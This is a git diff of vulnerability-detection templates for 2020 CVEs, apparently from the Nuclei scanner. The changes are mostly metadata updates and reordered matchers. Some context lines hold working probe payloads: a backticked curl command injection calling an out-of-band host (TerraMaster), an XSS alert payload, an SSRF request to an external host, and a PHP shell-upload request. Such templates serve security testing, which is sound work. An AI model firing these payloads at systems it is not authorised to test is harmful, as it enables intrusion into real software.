a/http/cves/2020/CVE-2020-26214.yaml b/http/cves/2020/CVE-2020-26214.yaml index 4021a65310..b096037fe3 100644 --- a/http/cves/2020/CVE-2020-26214.yaml +++ b/http/cves/2020/CVE-2020-26214.yaml @@ -10,16 +10,19 @@ info: - https://tools.ietf.org/html/rfc4513#section-5.1.2 - https://pypi.org/project/alerta-server/8.1.0/ - https://nvd.nist.gov/vuln/detail/CVE-2020-26214 + - https://github.com/alerta/alerta/commit/2bfa31779a4c9df2fa68fa4d0c5c909698c5ef65 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-26214 cwe-id: CWE-287 + epss-score: 0.01365 cpe: cpe:2.3:a:alerta_project:alerta:*:*:*:*:*:*:*:* - epss-score: 0.01307 - tags: cve,cve2020,alerta,auth-bypass metadata: max-request: 1 + vendor: alerta_project + product: alerta + tags: cve,cve2020,alerta,auth-bypass http: - method: GET @@ -28,6 +31,9 @@ http: matchers-condition: and matchers: + - type: dsl + dsl: + - compare_versions(version, '< 8.1.0') - type: word part: body @@ -37,10 +43,6 @@ http: - '"severity"' condition: and - - type: dsl - dsl: - - compare_versions(version, '< 8.1.0') - - type: status status: - 200 @@ -48,10 +50,10 @@ http: extractors: - type: regex name: version - internal: true group: 1 regex: - '"name": "Alerta ([0-9.]+)"' + internal: true - type: regex group: 1 diff --git a/http/cves/2020/CVE-2020-26217.yaml b/http/cves/2020/CVE-2020-26217.yaml index ea5d05b235..cb4acd7b2f 100644 --- a/http/cves/2020/CVE-2020-26217.yaml +++ b/http/cves/2020/CVE-2020-26217.yaml @@ -11,6 +11,7 @@ info: - https://github.com/x-stream/xstream/commit/0fec095d534126931c99fd38e9c6d41f5c685c1a - https://github.com/x-stream/xstream/security/advisories/GHSA-mw36-7c6c-q4q2 - https://nvd.nist.gov/vuln/detail/cve-2020-26217 + - https://lists.apache.org/thread.html/r2de526726e7f4db4a7cb91b7355070779f51a84fd985c6529c2f4e9e@%3Cissues.activemq.apache.org%3E remediation: Fixed in 1.4.14. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H @@ -18,9 +19,12 @@ info: cve-id: CVE-2020-26217 cwe-id: CWE-78 epss-score: 0.97456 - tags: cve,cve2020,xstream,deserialization,rce,oast + cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: xstream_project + product: xstream + tags: cve,cve2020,xstream,deserialization,rce,oast http: - raw: diff --git a/http/cves/2020/CVE-2020-26248.yaml b/http/cves/2020/CVE-2020-26248.yaml index cbb5982c6b..1744f058f9 100644 --- a/http/cves/2020/CVE-2020-26248.yaml +++ b/http/cves/2020/CVE-2020-26248.yaml @@ -11,17 +11,21 @@ info: - https://packagist.org/packages/prestashop/productcomments - https://github.com/PrestaShop/productcomments/security/advisories/GHSA-5v44-7647-xfw9 - https://nvd.nist.gov/vuln/detail/CVE-2020-26248 + - https://github.com/PrestaShop/productcomments/commit/7c2033dd811744e021da8897c80d6c301cd45ffa remediation: Fixed in 4.2.1. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H cvss-score: 8.2 cve-id: CVE-2020-26248 cwe-id: CWE-89 - cpe: cpe:2.3:a:prestashop:productcomments:*:*:*:*:*:*:*:* - epss-score: 0.0128 + epss-score: 0.01488 + cpe: cpe:2.3:a:prestashop:productcomments:*:*:*:*:*:prestashop:*:* metadata: max-request: 1 verified: true + framework: prestashop + vendor: prestashop + product: productcomments tags: cve,cve2020,sqli,prestshop,packetstorm http: diff --git a/http/cves/2020/CVE-2020-26258.yaml b/http/cves/2020/CVE-2020-26258.yaml index 5a54386d7a..3b55b213b5 100644 --- a/http/cves/2020/CVE-2020-26258.yaml +++ b/http/cves/2020/CVE-2020-26258.yaml @@ -11,6 +11,7 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26258 - https://github.com/x-stream/xstream/security/advisories/GHSA-4cch-wxpw-8p28 - https://nvd.nist.gov/vuln/detail/CVE-2020-26258 + - https://lists.apache.org/thread.html/r97993e3d78e1f5389b7b172ba9f308440830ce5f051ee62714a0aa34@%3Ccommits.struts.apache.org%3E remediation: Install at least 1.4.15 if you rely on XStream's default blacklist of the Security Framework, and at least Java 15 or higher. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N @@ -18,9 +19,12 @@ info: cve-id: CVE-2020-26258 cwe-id: CWE-918 epss-score: 0.93377 - tags: cve,cve2020,xstream,ssrf,oast + cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: xstream_project + product: xstream + tags: cve,cve2020,xstream,ssrf,oast http: - raw: diff --git a/http/cves/2020/CVE-2020-26413.yaml b/http/cves/2020/CVE-2020-26413.yaml index 2e3fa34612..11ef5209b4 100644 --- a/http/cves/2020/CVE-2020-26413.yaml +++ b/http/cves/2020/CVE-2020-26413.yaml @@ -9,17 +9,20 @@ info: - https://gitlab.com/gitlab-org/gitlab/-/issues/244275 - https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26413.json - https://nvd.nist.gov/vuln/detail/CVE-2020-26413 + - https://hackerone.com/reports/972355 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2020-26413 cwe-id: CWE-200 - cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:* - epss-score: 0.70208 + epss-score: 0.64648 + cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 shodan-query: http.title:"GitLab" - tags: cve,cve2020,gitlab,exposure,enum,graphql + vendor: gitlab + product: gitlab + tags: hackerone,cve,cve2020,gitlab,exposure,enum,graphql http: - raw: @@ -50,6 +53,6 @@ http: extractors: - type: json - part: body json: - '.data.users.edges[].node.email' + part: body diff --git a/http/cves/2020/CVE-2020-26876.yaml b/http/cves/2020/CVE-2020-26876.yaml index 637e46299d..700221c04f 100644 --- a/http/cves/2020/CVE-2020-26876.yaml +++ b/http/cves/2020/CVE-2020-26876.yaml @@ -10,16 +10,20 @@ info: - https://www.exploit-db.com/exploits/48910 - https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/ - https://plugins.trac.wordpress.org/changeset/2388997 + - https://plugins.trac.wordpress.org/changeset/2389243 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-26876 cwe-id: CWE-306 - cpe: cpe:2.3:a:wpcoursesplugin:wp-courses:*:*:*:*:*:*:*:* - epss-score: 0.01185 - tags: cve,cve2020,wordpress,wp-plugin,exposure,edb + epss-score: 0.01156 + cpe: cpe:2.3:a:wpcoursesplugin:wp-courses:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: wpcoursesplugin + product: wp-courses + tags: cve,cve2020,wordpress,wp-plugin,exposure,edb http: - method: GET @@ -28,6 +32,11 @@ http: matchers-condition: and matchers: + - type: word + part: header + words: + - "application/json" + - type: regex part: body regex: @@ -35,11 +44,6 @@ http: - "\"(guid|title|content|excerpt)\":{\"rendered\":" condition: or - - type: word - part: header - words: - - "application/json" - - type: status status: - 200 diff --git a/http/cves/2020/CVE-2020-26919.yaml b/http/cves/2020/CVE-2020-26919.yaml index 139d219bb8..13fce36c42 100644 --- a/http/cves/2020/CVE-2020-26919.yaml +++ b/http/cves/2020/CVE-2020-26919.yaml @@ -14,10 +14,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-26919 - epss-score: 0.974 - tags: cve,cve2020,netgear,rce,oast,router,unauth,kev + epss-score: 0.97428 + cpe: cpe:2.3:o:netgear:jgs516pe_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netgear + product: jgs516pe_firmware + tags: cve,cve2020,netgear,rce,oast,router,unauth,kev http: - raw: @@ -30,6 +33,6 @@ http: matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" diff --git a/http/cves/2020/CVE-2020-26948.yaml b/http/cves/2020/CVE-2020-26948.yaml index f4f92f1ea4..32212767b8 100644 --- a/http/cves/2020/CVE-2020-26948.yaml +++ b/http/cves/2020/CVE-2020-26948.yaml @@ -14,26 +14,31 @@ info: cvss-score: 9.8 cve-id: CVE-2020-26948 cwe-id: CWE-918 + epss-score: 0.04143 cpe: cpe:2.3:a:emby:emby:*:*:*:*:*:*:*:* - epss-score: 0.0284 - tags: cve,cve2020,emby,jellyfin,ssrf metadata: max-request: 1 + vendor: emby + product: emby + tags: cve,cve2020,emby,jellyfin,ssrf http: - method: GET path: - "{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net" + matchers-condition: and matchers: + - type: word + part: body + words: + - "Name or service not known" + + - type: word + part: header + words: + - "text/plain" + - type: status status: - 500 - - type: word - words: - - "Name or service not known" - part: body - - type: word - words: - - "text/plain" - part: header diff --git a/http/cves/2020/CVE-2020-27191.yaml b/http/cves/2020/CVE-2020-27191.yaml index 15a672febc..d458c14c45 100644 --- a/http/cves/2020/CVE-2020-27191.yaml +++ b/http/cves/2020/CVE-2020-27191.yaml @@ -14,11 +14,13 @@ info: cvss-score: 7.5 cve-id: CVE-2020-27191 cwe-id: CWE-22 + epss-score: 0.00632 cpe: cpe:2.3:a:lionwiki:lionwiki:*:*:*:*:*:*:*:* - epss-score: 0.00723 - tags: cve,cve2020,lionwiki,lfi,oss metadata: max-request: 1 + vendor: lionwiki + product: lionwiki + tags: cve,cve2020,lionwiki,lfi,oss http: - method: GET diff --git a/http/cves/2020/CVE-2020-2733.yaml b/http/cves/2020/CVE-2020-2733.yaml index b65d607b41..7bc228cf0e 100644 --- a/http/cves/2020/CVE-2020-2733.yaml +++ b/http/cves/2020/CVE-2020-2733.yaml @@ -14,12 +14,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-2733 - cpe: cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:* - epss-score: 0.10266 + epss-score: 0.1375 + cpe: cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: port:8999 product:"Oracle WebLogic Server" verified: true + vendor: oracle + product: jd_edwards_enterpriseone_tools tags: cve,cve2020,oracle,weblogic,disclosure,exposure http: diff --git a/http/cves/2020/CVE-2020-27361.yaml b/http/cves/2020/CVE-2020-27361.yaml index bab77bc8e5..7c1851a0a4 100644 --- a/http/cves/2020/CVE-2020-27361.yaml +++ b/http/cves/2020/CVE-2020-27361.yaml @@ -6,18 +6,19 @@ info: severity: high description: Akkadian Provisioning Manager 4.50.02 could allow viewing of sensitive information within the /pme subdirectories. reference: - - https://www.blacklanternsecurity.com/2021-07-01-Akkadian-CVE/ - https://nvd.nist.gov/vuln/detail/CVE-2020-27191 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-27361 cwe-id: CWE-668 - cpe: cpe:2.3:a:akkadianlabs:akkadian_provisioning_manager:*:*:*:*:*:*:*:* - epss-score: 0.03049 - tags: cve,cve2020,akkadian,listing,exposure + epss-score: 0.02936 + cpe: cpe:2.3:a:akkadianlabs:akkadian_provisioning_manager:4.50.02:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: akkadianlabs + product: akkadian_provisioning_manager + tags: cve,cve2020,akkadian,listing,exposure http: - method: GET diff --git a/http/cves/2020/CVE-2020-27467.yaml b/http/cves/2020/CVE-2020-27467.yaml index 9c0547bffd..29162b61f7 100644 --- a/http/cves/2020/CVE-2020-27467.yaml +++ b/http/cves/2020/CVE-2020-27467.yaml @@ -15,11 +15,13 @@ info: cvss-score: 7.5 cve-id: CVE-2020-27467 cwe-id: CWE-22 + epss-score: 0.00378 cpe: cpe:2.3:a:processwire:processwire:*:*:*:*:*:*:*:* - epss-score: 0.00324 - tags: cve,cve2020,processwire,lfi,cms,oss metadata: max-request: 1 + vendor: processwire + product: processwire + tags: cve,cve2020,processwire,lfi,cms,oss http: - method: GET diff --git a/http/cves/2020/CVE-2020-27481.yaml b/http/cves/2020/CVE-2020-27481.yaml index 1a70b65867..0bf6b9376f 100644 --- a/http/cves/2020/CVE-2020-27481.yaml +++ b/http/cves/2020/CVE-2020-27481.yaml @@ -11,10 +11,18 @@ info: - https://gist.github.com/0xx7/a7aaa8b0515139cf7e30c808c8d54070 - https://nvd.nist.gov/vuln/detail/CVE-2020-27481 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2020-27481 - tags: goodlayerslms,sqli,wpscan,cve,cve2020 + cwe-id: CWE-89 + epss-score: 0.1745 + cpe: cpe:2.3:a:goodlayers:good_learning_management_system:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: goodlayers + product: good_learning_management_system + tags: goodlayerslms,sqli,wpscan,cve,cve2020 http: - raw: diff --git a/http/cves/2020/CVE-2020-27735.yaml b/http/cves/2020/CVE-2020-27735.yaml index df404c2e40..79d08426b8 100644 --- a/http/cves/2020/CVE-2020-27735.yaml +++ b/http/cves/2020/CVE-2020-27735.yaml @@ -15,11 +15,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-27735 cwe-id: CWE-79 - cpe: cpe:2.3:a:wftpserver:wing_ftp_server:*:*:*:*:*:*:*:* epss-score: 0.00179 - tags: cve,cve2020,xss,wing-ftp + cpe: cpe:2.3:a:wftpserver:wing_ftp_server:6.4.4:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: wftpserver + product: wing_ftp_server + tags: cve,cve2020,xss,wing-ftp http: - method: GET @@ -29,15 +31,15 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-27866.yaml b/http/cves/2020/CVE-2020-27866.yaml index 9ee66954e5..687a3394eb 100644 --- a/http/cves/2020/CVE-2020-27866.yaml +++ b/http/cves/2020/CVE-2020-27866.yaml @@ -15,11 +15,14 @@ info: cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-27866 - cwe-id: CWE-288 + cwe-id: CWE-288,CWE-287 epss-score: 0.00365 - tags: cve,cve2020,netgear,auth-bypass + cpe: cpe:2.3:o:netgear:ac2100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netgear + product: ac2100_firmware + tags: cve,cve2020,netgear,auth-bypass http: - raw: @@ -33,11 +36,11 @@ http: matchers-condition: and matchers: + - type: word + part: body + words: + - 'Debug Enable!' + - type: status status: - 200 - - - type: word - words: - - 'Debug Enable!' - part: body diff --git a/http/cves/2020/CVE-2020-27982.yaml b/http/cves/2020/CVE-2020-27982.yaml index 4fd6e88063..f8b813a318 100644 --- a/http/cves/2020/CVE-2020-27982.yaml +++ b/http/cves/2020/CVE-2020-27982.yaml @@ -15,11 +15,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-27982 cwe-id: CWE-79 - cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:* - epss-score: 0.0017 + epss-score: 0.00167 + cpe: cpe:2.3:a:icewarp:mail_server:11.4.5:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"icewarp" + vendor: icewarp + product: mail_server tags: xss,icewarp,packetstorm,cve,cve2020 http: @@ -29,16 +31,16 @@ http: matchers-condition: and matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - "text/html" + - type: status status: - 200 - - - type: word - words: - - "" - part: body - - - type: word - words: - - "text/html" - part: header diff --git a/http/cves/2020/CVE-2020-27986.yaml b/http/cves/2020/CVE-2020-27986.yaml index d1af81738b..65bbc3cede 100644 --- a/http/cves/2020/CVE-2020-27986.yaml +++ b/http/cves/2020/CVE-2020-27986.yaml @@ -15,12 +15,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-27986 - cwe-id: CWE-306,CWE-312 - cpe: cpe:2.3:a:sonarsource:sonarqube:*:*:*:*:*:*:*:* - epss-score: 0.23185 - tags: cve,cve2020,sonarqube + cwe-id: CWE-306 + epss-score: 0.1352 + cpe: cpe:2.3:a:sonarsource:sonarqube:8.4.2.36762:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: sonarsource + product: sonarqube + tags: cve,cve2020,sonarqube http: - method: GET @@ -30,13 +32,14 @@ http: matchers-condition: and matchers: - type: word + part: body words: - email.smtp_host.secured - email.smtp_password.secured - email.smtp_port.secured - email.smtp_username.secured - part: body condition: and + - type: status status: - 200 diff --git a/http/cves/2020/CVE-2020-28188.yaml b/http/cves/2020/CVE-2020-28188.yaml index e170f2ff60..c6587b0d51 100644 --- a/http/cves/2020/CVE-2020-28188.yaml +++ b/http/cves/2020/CVE-2020-28188.yaml @@ -10,17 +10,19 @@ info: - https://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/ - https://nvd.nist.gov/vuln/detail/CVE-2020-28188 + - http://packetstormsecurity.com/files/172880/TerraMaster-TOS-4.2.06-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-28188 cwe-id: CWE-78 + epss-score: 0.97235 cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* - epss-score: 0.97266 - tags: cve,cve2020,terramaster,rce,oast,mirai,unauth metadata: max-request: 2 - + vendor: terra-master + product: tos + tags: packetstorm,cve,cve2020,terramaster,rce,oast,mirai,unauth variables: useragent: '{{rand_base(6)}}' @@ -29,16 +31,16 @@ http: - | GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1 Host: {{Hostname}} - - | GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1 Host: {{Hostname}} stop-at-first-match: true + matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" diff --git a/http/cves/2020/CVE-2020-28208.yaml b/http/cves/2020/CVE-2020-28208.yaml index 45d2b922ba..68054c1ac0 100644 --- a/http/cves/2020/CVE-2020-28208.yaml +++ b/http/cves/2020/CVE-2020-28208.yaml @@ -16,10 +16,12 @@ info: cvss-score: 5.3 cve-id: CVE-2020-28208 cwe-id: CWE-203 + epss-score: 0.00603 cpe: cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:* - epss-score: 0.00732 metadata: max-request: 1 + vendor: rocket.chat + product: rocket.chat tags: packetstorm,cve,cve2020,rocketchat http: @@ -34,12 +36,13 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: word + part: body words: - '"result\":false' - '"success":true' - part: body condition: and + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-28351.yaml b/http/cves/2020/CVE-2020-28351.yaml index b2aefe7d6e..ef27c1dbc1 100644 --- a/http/cves/2020/CVE-2020-28351.yaml +++ b/http/cves/2020/CVE-2020-28351.yaml @@ -10,34 +10,39 @@ info: - https://www.mitel.com/articles/what-happened-shoretel-products - https://nvd.nist.gov/vuln/detail/CVE-2020-28351 - http://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html + - https://github.com/dievus/cve-2020-28351 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-28351 cwe-id: CWE-79 - epss-score: 0.0031 - tags: packetstorm,cve,cve2020,shoretel,xss + epss-score: 0.00314 + cpe: cpe:2.3:o:mitel:shoretel_firmware:19.46.1802.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: mitel + product: shoretel_firmware + tags: packetstorm,cve,cve2020,shoretel,xss http: - method: GET path: - "{{BaseURL}}/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME" + headers: Content-Type: application/x-www-form-urlencoded matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - type: word + part: header words: - 'Content-Type: text/html' - part: header - type: status status: diff --git a/http/cves/2020/CVE-2020-28871.yaml b/http/cves/2020/CVE-2020-28871.yaml index 967a510c8b..2e7fb0d4cc 100644 --- a/http/cves/2020/CVE-2020-28871.yaml +++ b/http/cves/2020/CVE-2020-28871.yaml @@ -10,15 +10,18 @@ info: - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/ - https://nvd.nist.gov/vuln/detail/CVE-2020-28871 - http://packetstormsecurity.com/files/163263/Monitorr-1.7.6m-Bypass-Information-Disclosure-Shell-Upload.html + - http://packetstormsecurity.com/files/170974/Monitorr-1.7.6-Shell-Upload.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-28871 cwe-id: CWE-434 - cpe: cpe:2.3:a:monitorr_project:monitorr:*:*:*:*:*:*:*:* - epss-score: 0.96822 + epss-score: 0.96694 + cpe: cpe:2.3:a:monitorr_project:monitorr:1.7.6m:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: monitorr_project + product: monitorr tags: unauth,cve,fileupload,monitor,edb,intrusive,packetstorm,cve2020,rce http: @@ -42,7 +45,6 @@ http: GIF89a213213123 -----------------------------31046105003900160576454225745-- - - | GET /assets/data/usrimg/{{tolower("{{randstr}}.php")}} HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2020/CVE-2020-28976.yaml b/http/cves/2020/CVE-2020-28976.yaml index 5691ef7628..5b9d534f88 100644 --- a/http/cves/2020/CVE-2020-28976.yaml +++ b/http/cves/2020/CVE-2020-28976.yaml @@ -10,16 +10,20 @@ info: - https://www.canto.com/integrations/wordpress/ - https://github.com/CantoDAM/Canto-Wordpress-Plugin - https://nvd.nist.gov/vuln/detail/CVE-2020-28976 + - http://packetstormsecurity.com/files/160358/WordPress-Canto-1.3.0-Server-Side-Request-Forgery.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2020-28976 cwe-id: CWE-918 - cpe: cpe:2.3:a:canto:canto:*:*:*:*:*:*:*:* - epss-score: 0.004 - tags: cve,cve2020,ssrf,wordpress,wp-plugin,oast,edb + epss-score: 0.00452 + cpe: cpe:2.3:a:canto:canto:1.3.0:*:*:*:*:wordpress:*:* metadata: max-request: 3 + framework: wordpress + vendor: canto + product: canto + tags: packetstorm,cve,cve2020,ssrf,wordpress,wp-plugin,oast,edb http: - method: GET @@ -29,6 +33,7 @@ http: - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2020/CVE-2020-29164.yaml b/http/cves/2020/CVE-2020-29164.yaml index f861da7ef6..f59e74ba1b 100644 --- a/http/cves/2020/CVE-2020-29164.yaml +++ b/http/cves/2020/CVE-2020-29164.yaml @@ -14,11 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-29164 cwe-id: CWE-79 - cpe: cpe:2.3:a:rainbowfishsoftware:pacsone_server:*:*:*:*:*:*:*:* epss-score: 0.00159 - tags: pacsone,xss,cve,cve2020 + cpe: cpe:2.3:a:rainbowfishsoftware:pacsone_server:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: rainbowfishsoftware + product: pacsone_server + tags: pacsone,xss,cve,cve2020 http: - method: GET @@ -27,16 +29,15 @@ http: matchers-condition: and matchers: - - type: word + part: header words: - "text/html" - part: header - type: word + part: body words: - '1' - part: body - type: status status: diff --git a/http/cves/2020/CVE-2020-29227.yaml b/http/cves/2020/CVE-2020-29227.yaml index 869fe1f122..f6fea46912 100644 --- a/http/cves/2020/CVE-2020-29227.yaml +++ b/http/cves/2020/CVE-2020-29227.yaml @@ -13,11 +13,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-29227 - cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:*:*:*:*:*:*:*:* - epss-score: 0.00625 - tags: cve,cve2020,lfi + epss-score: 0.00544 + cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: car_rental_management_system_project + product: car_rental_management_system + tags: cve,cve2020,lfi http: - method: GET diff --git a/http/cves/2020/CVE-2020-29284.yaml b/http/cves/2020/CVE-2020-29284.yaml index 5d43730901..22a88089ae 100644 --- a/http/cves/2020/CVE-2020-29284.yaml +++ b/http/cves/2020/CVE-2020-29284.yaml @@ -11,16 +11,19 @@ info: - https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip - https://github.com/BigTiger2020/-Multi-Restaurant-Table-Reservation-System/blob/main/README.md - https://nvd.nist.gov/vuln/detail/CVE-2020-29284 + - https://www.sourcecodester.com/php/14568/multi-restaurant-table-reservation-system-php-full-source-code.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-29284 cwe-id: CWE-89 - cpe: cpe:2.3:a:multi_restaurant_table_reservation_system_project:multi_restaurant_table_reservation_system:*:*:*:*:*:*:*:* - epss-score: 0.02921 + epss-score: 0.05055 + cpe: cpe:2.3:a:multi_restaurant_table_reservation_system_project:multi_restaurant_table_reservation_system:1.0:*:*:*:*:*:*:* metadata: max-request: 1 verified: true + vendor: multi_restaurant_table_reservation_system_project + product: multi_restaurant_table_reservation_system tags: cve2020,tablereservation,sqli,unauth,edb,cve http: diff --git a/http/cves/2020/CVE-2020-29395.yaml b/http/cves/2020/CVE-2020-29395.yaml index d9ca422678..ce62bdb148 100644 --- a/http/cves/2020/CVE-2020-29395.yaml +++ b/http/cves/2020/CVE-2020-29395.yaml @@ -15,10 +15,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-29395 cwe-id: CWE-79 - cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:*:*:* - epss-score: 0.03985 + epss-score: 0.03749 + cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: myeventon + product: eventon tags: cve,cve2020,wordpress,xss,wp-plugin,packetstorm http: @@ -29,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2020/CVE-2020-29453.yaml b/http/cves/2020/CVE-2020-29453.yaml index 520beacb68..142e6cda98 100644 --- a/http/cves/2020/CVE-2020-29453.yaml +++ b/http/cves/2020/CVE-2020-29453.yaml @@ -14,10 +14,13 @@ info: cve-id: CVE-2020-29453 cwe-id: CWE-22 epss-score: 0.0129 + cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.component:"Atlassian Jira" - tags: cve,cve2020,atlassian,jira,lfi + vendor: atlassian + product: data_center + tags: cve,cve2020,atlassian,jira,lfi,intrusive http: - method: GET @@ -27,11 +30,11 @@ http: matchers-condition: and matchers: + - type: word + part: body + words: + - com.atlassian.jira + - type: status status: - 200 - - - type: word - words: - - 'com.atlassian.jira' - part: body diff --git a/http/cves/2020/CVE-2020-29583.yaml b/http/cves/2020/CVE-2020-29583.yaml index da1087b5d6..a80efb85e7 100644 --- a/http/cves/2020/CVE-2020-29583.yaml +++ b/http/cves/2020/CVE-2020-29583.yaml @@ -11,15 +11,20 @@ info: - https://support.zyxel.eu/hc/en-us/articles/360018524720-Zyxel-security-advisory-for-hardcoded-credential-vulnerability-CVE-2020-29583 - https://nvd.nist.gov/vuln/detail/CVE-2020-29583 - https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html + - http://ftp.zyxel.com/USG40/firmware/USG40_4.60(AALA.1)C0_2.pdf classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-29583 cwe-id: CWE-522 + epss-score: 0.95315 + cpe: cpe:2.3:o:zyxel:usg20-vpn_firmware:4.60:*:*:*:*:*:*:* metadata: max-request: 2 verified: true shodan-query: title:"USG FLEX 100" + vendor: zyxel + product: usg20-vpn_firmware tags: cve,cve2020,ftp-backdoor,zyxel,bypass,kev http: @@ -27,12 +32,12 @@ http: - | GET 